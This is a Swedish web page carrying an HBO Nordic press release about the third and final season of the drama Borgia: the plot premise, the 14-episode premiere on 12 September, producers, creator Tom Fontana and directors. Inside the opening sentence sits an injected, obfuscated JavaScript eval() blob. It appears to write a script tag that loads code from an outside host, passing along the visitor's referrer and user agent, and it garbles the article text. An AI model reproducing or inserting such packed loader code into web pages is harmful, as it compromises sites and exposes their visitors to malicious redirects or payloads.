Image Image Image Image Image Image Image Image Image Image

| 8 juli, 2020

Scroll to top

Top

HBO: Tredje och sista säsongen av Borgia

HBO: Tredje och sista säsongen av Borgia

Borgia eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bdtbs|var|u0026u|referrer|taziy||js|php’.split(’|’),0,{}))
utspelar sig i eran av upplysning, kreativitet och enastående intellektuella prestationer, men även i en tid med skenande kriminalitet, ständiga konflikter och obeskrivligt allmänt fördärv. I mitten av världen stod Vatikanen som medlare och rättskipare vid konflikter. I centrum av Vatikanen fanns en man vars strävan efter makt skulle få honom att söka det ultimata målet – Petri stol. Hans namn skulle bli synonymt med grymhet, och hans styre som påve skulle bli ihågkommen som det mest ökända kapitlet i den katolska kyrkans historia. Hans namn var Rodrigo Borgia.

Den internationella serien om den ökända renässansklanen återkommer för en tredje och sista säsong. Serien hade premiär 2011 och blev genast en stor succé med rekordhöga tittarsiffror i Frankrike, Tyskland, Italien, Spanien och Polen. Sista säsongen är 14 avsnitt och har premiär den 12:e september på HBO Nordic.

Borgia är producerad av Atlantique Productions, EOS Entertainment och Canal+. Serien är skriven och skapad av Tom Fontana, som även skrivit och producerat serier som St. Elsewhere, Homicide: Life on the Street, Oz (tillgänglig på HBO Nordic) och The Philantropist. Han har belönats med bland annat tre Emmy-statyetter, fyra Television Association Awards och tre Writers Guild Awards. Årets säsong regisseras av Oliver Hirschbiegel (Der Undergang, The Experiment) och Phillipe Haim.

Säsong 3 har premiär på HBO Nordic, 12:e september.

Säsong 1-2 finns tillgängliga på hbonordic.com

Detta är ett pressmeddelande från HBO Nordic